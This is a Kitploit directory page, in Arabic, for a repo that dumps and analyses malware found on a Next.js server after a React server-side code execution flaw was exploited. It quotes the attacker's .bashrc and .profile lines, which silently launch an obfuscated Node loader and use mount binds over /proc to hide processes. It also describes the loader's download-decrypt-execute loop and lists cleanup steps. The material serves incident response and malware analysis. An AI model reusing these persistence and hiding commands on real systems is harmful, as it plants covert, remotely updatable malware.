Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
react-cve-2025-55182 — برمجية ضارة وجدتها على خادمي | Kitploit
أدوات/GitHubGitHub/stonelinks/react-cve-2025-55182
آليات الاستمراريةالهندسة العكسيةتسريب البياناتالتحقيق الجنائي الرقميتحليل البرمجيات الخبيثةالقيادة والسيطرةاستخبارات التهديداتالاستجابة للحوادثتطوير الحمولات
GitHubstonelinks/react-cve-2025-55182

react-cve-2025-55182

برمجية ضارة وجدتها على خادمي

منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

react-cve-2025-55182

هذه تفريغة للبرامج الضارة وغيرها من المواد المشبوهة التي وجدتها على خادم موقع زفافي بعد استغلال ثغرة تنفيذ الكود من جانب الخادم في React. إنها Droplet صغيرة على Digital Ocean تدير تطبيق Next.js عاديًا إلى حد ما.

CVE: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

سجل لنشاط الخادم يظهر ارتفاعات وأشياء مختلفة: image

يبدو أن الشيء الرئيسي الخبيث هو هذا المثبت في /.local/share/.r0qsv8h1

الأشياء التي وجدتها

في bashrc الخاص بي:

root@kitploit:~
# System
(nohup /.local/share/.r0qsv8h1/.394ly8v9/bin/node /.local/share/.r0qsv8h1/.fvq2lzl64e.js >/dev/null 2>&1 &) 2>/dev/null
pgrep -f mesh | xargs -I {} mount -n --bind /dev/shm /proc/{} 2>/dev/null
pgrep -f mesh | xargs -I {} mount -n --bind /dev/shm /proc/{} 2>/dev/null
pgrep -f mesh | xargs -I {} mount -n --bind /dev/shm /proc/{} 2>/dev/null

لاحظ أن أوامر pgrep موجودة لمنع هذا البرنامج الضار المزيف الآخر "meshagent" من العمل. يمكنك القراءة عنه في مستند MESHAGENT.md.

في ملف profile الخاص بي يوجد نفس الشيء

root@kitploit:~
# App
(/.local/share/.r0qsv8h1/.394ly8v9/bin/node /.local/share/.r0qsv8h1/.fvq2lzl64e.js >/dev/null 2>&1 &) 2>/dev/null

يمكنك رؤية خدمات مشبوهة أخرى في SUSPICIOUS_SERVICES.md

إليك تحليل لهذا البرنامج الضار الرئيسي:

نظرة عامة على محتويات /.local/

يحتوي الدليل bad على بيئة تشغيل Node.js مستقلة مع مجموعة من ملفات JavaScript شديدة التعتيم.
كل الأدلة تشير إلى أن هذا هو برنامج ضار يقوم بالتنزيل يتصل بصمت بخادم بعيد، ويحمل حمولة مشفرة، ويفك تشفيرها، ويكتبها على القرص، وينفذها كعملية خلفية منفصلة. يقوم الكود أيضًا بفحص الخادم بشكل دوري للحصول على تحديثات.

الملفات وأغراضها

فك تشفير البيان

الحمولة المشفرة بـ Base64 في .5f8562 تفك تشفيرها إلى:

root@kitploit:~
{
  "0": "c6aeb84b-0600-4e82-ae3e-f7d441a2fd7c",
  "1": ".fvq2lzj6te.js",
  "3": 1765307786421,
  "4": "desktop"
}
  • المفتاح "1" يشير إلى البرنامج النصي الرئيسي المحمل (المعتم).
  • المفتاح "0" هو UUID يُستخدم على الأرجح بواسطة الخادم البعيد للتتبع.
  • المفتاح "3" هو طابع زمني (مللي ثانية من Unix epoch) يشير إلى وقت إنشاء البيان.
  • المفتاح "4" يشير إلى الموقع المقصود (desktop)، مما يوحي بأن الحمولة قد تحاول إخفاء نفسها هناك.

تدفق التنفيذ

  1. الإقلاع – عندما يبدأ تشغيل Node المضمن (على سبيل المثال، node .5f8562)، يشير البيان إلى .fvq2lzj6te.js.
  2. المحمل – ينشئ المحمل طلب JSON‑RPC إلى خادم تحكم وأوامر بعيد، ويستقبل كتلة مشفرة بـ base64، ويفك تشفيرها باستخدام خوارزمية تشبه RC4 مخصصة.
  3. نشر الحمولة – تُكتب البيانات المفكوكة إلى ملف عشوائي الاسم في بيئة المستخدم وتُنفذ كعملية فرعية منفصلة.
  4. الثبات / حلقة التحديث – يقوم مؤقت setInterval بتكرار تسلسل التنزيل-فك التشفير-التشغيل بشكل دوري، مما يسمح للمهاجم بدفع حمولات جديدة أو محدثة دون تدخل إضافي من المستخدم.
  5. التنفيذ في الخلفية – تعمل العملية المنبثقة ببيئة خاصة بها (PATH، cwd، إلخ) وقد تقوم بأفعال ضارة نموذجية مثل التعدين المشفر، أو سرقة بيانات الاعتماد، أو تنفيذ أوامر عن بعد.

التأثير المحتمل

  • اختراق النظام – تنفيذ كود عشوائي بصلاحيات المستخدم الذي شغل بيئة تشغيل Node.
  • الثبات – يضمن الاستقصاء الدوري إمكانية تحديث البرنامج الضار أو استبداله في أي وقت.
  • إساءة استخدام الموارد – من المحتمل تشغيل مهام كثيفة الاستخدام لوحدة المعالجة المركزية (مثل تعدين العملات الرقمية) أو تسريب البيانات.
  • التخفي – الملفات معتمة بشدة، ووجود README لـ Node يبدو مشروعًا يساعد في إخفاء الطبيعة الضارة.

التوصيات

  1. الإزالة الفورية – احذف الدليل .r0qsv8h1 بالكامل وأي ملفات قد يكون أنشأها (تحقق من مجلد Desktop والمجلدات المؤقتة للمستخدم بحثًا عن ملفات تنفيذية تم إنشاؤها حديثًا).
  2. فحص النظام – قم بتشغيل ماسح ضوئي موثوق لمكافحة البرامج الضارة على المضيف لاكتشاف أي مكونات متبقية.
  3. التحقق من مسارات التنفيذ – تأكد من عدم وجود نصوص بدء تشغيل أو مهام مجدولة تشير إلى ملفات في هذا الدليل.
  4. مراقبة الشبكة – امنع الاتصالات الصادرة إلى عناوين IP/مضيفين غير معروفين من الجهاز المصاب وراجع حركة مرور الشبكة الحديثة بحثًا عن طلبات صادرة مشبوهة.
  5. تحديث سياسات الأمان – قيّد تشغيل الملفات الثنائية والبرامج النصية غير المعروفة، خاصة تلك التي تم تنزيلها إلى مواقع قابلة للكتابة من قبل المستخدم.

تم إجراء هذا التحليل تلقائيًا بواسطة مساعد ذكاء اصطناعي بناءً على فحص ثابت للملفات الموجودة في الدليل. لم يتم إجراء أي تنفيذ أثناء التشغيل.

يمكنك قراءة المزيد في DEOBFUSCATE.md

تنزيل الأداة
الملفالوصف
.394ly8v9/README.mdREADME قياسي لـ Node.js – غير مرتبط بالوظائف الضارة؛ موجود فقط لجعل الحزمة تبدو مشروعة.
.fvq2lzl64e.js~5 كيلوبايت من JavaScript معتم. يقوم ببناء طلب HTTP من نوع JSON‑RPC، ويستقبل حمولة مشفرة بـ base64، ويفك تشفيرها باستخدام تشفير مخصص، ويكتب الحمولة إلى ملف عشوائي، وينفذها عبر child_process.spawn / execSync. كما يقوم بإطلاق عملية خلفية منفصلة تستقصي الخادم البعيد بشكل متكرر.
.lauphhtqrg.js~13 كيلوبايت من JavaScript معتم. ينفذ حلقة تنزيل-فك تشفير-تشغيل مماثلة مع تشفير خاص بها من نوع RC4 (dec). يكتب الحمولة المفكوكة إلى اسم ملف مولّد ويشغلها. يضبط مؤقتًا لجلب حمولات جديدة لاحقًا.
.5f8562سلسلة Base64 بنص عادي. تفك تشفيرها إلى بيان JSON صغير: json { "0":"c6aeb84b-0600-4e82-ae3e-f7d441a2fd7c", "1":".fvq2lzj6te.js", "3":1765307786421, "4":"desktop" } يخبر هذا البيان المحمّل بأي برنامج نصي ينفذ (.fvq2lzj6te.js) ويوفر معرّفًا/طابع زمني.
.b0rtqscrkeovلم يتم فحصه بعد، لكن نمط التسمية يشير إلى أنه مكون آخر من نفس السلسلة الضارة.
bin/node وملفات lib/ المرافقةبيئة تشغيل Node.js كاملة، مما يسمح للبرامج النصية بالعمل على النظام حتى إذا لم يكن Node.js مثبتًا.